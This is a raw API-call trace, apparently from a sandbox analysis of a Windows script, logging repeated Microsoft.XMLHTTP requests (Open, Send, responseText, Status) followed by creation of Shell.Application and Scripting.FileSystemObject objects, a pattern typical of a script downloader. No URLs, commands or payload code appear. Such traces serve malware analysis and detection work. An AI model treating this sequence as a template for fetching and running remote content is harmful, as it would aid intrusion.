	[0411.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0411.519] longjmp () 
	[0411.519] longjmp () 
	[0411.519] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0411.519] SysStringLen (param_1=0x0) returned 0x0
	[0411.519] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0411.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0411.519] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0411.519] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0411.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0411.519] ??2@YAPEAX_K@Z () returned 0x62f330
	[0411.520] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0411.520] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0411.520] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0411.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0411.520] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0411.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0411.520] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0411.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0411.520] longjmp () 
	[0411.520] longjmp () 
	[0411.520] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0411.520] SysStringLen (param_1=0x0) returned 0x0
	[0411.520] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0411.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0411.521] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0411.521] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0411.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0411.521] ??2@YAPEAX_K@Z () returned 0x62f310
	[0411.521] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f310) 
	[0411.521] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0411.521] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0411.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0411.521] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0411.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0411.521] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0411.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0411.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0411.521] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0411.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0411.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0411.688] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0411.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0411.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0411.688] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0411.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0411.688] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0411.689] SysStringLen (param_1=0x0) returned 0x0
	[0411.689] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0411.689] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0411.689] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0411.689] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0411.689] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0411.689] ??2@YAPEAX_K@Z () returned 0x62f350
	[0411.689] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0411.689] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0411.689] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0411.689] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0411.689] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0411.689] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0411.689] SysStringLen (param_1=0x0) returned 0x0
	[0411.689] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0411.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0411.691] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0411.692] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0411.692] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0411.692] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0411.692] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0412.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0412.426] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0412.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0412.428] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0412.428] SysStringLen (param_1=0x0) returned 0x0
	[0412.428] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0412.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0412.428] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0412.428] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0412.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0412.428] ??2@YAPEAX_K@Z () returned 0x62f310
	[0412.428] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0412.428] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0412.428] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0412.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0412.428] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0412.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0412.429] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0412.431] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0412.431] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0412.431] SysStringLen (param_1=0x0) returned 0x0
	[0412.431] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0412.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0412.432] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7300) returned 0x0
	[0412.432] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0412.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0412.432] ??2@YAPEAX_K@Z () returned 0x62f330
	[0412.432] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f330) 
	[0412.432] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0412.432] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0412.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7300) returned 0x0
	[0412.432] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7300) returned 0x3
	[0412.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0412.432] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
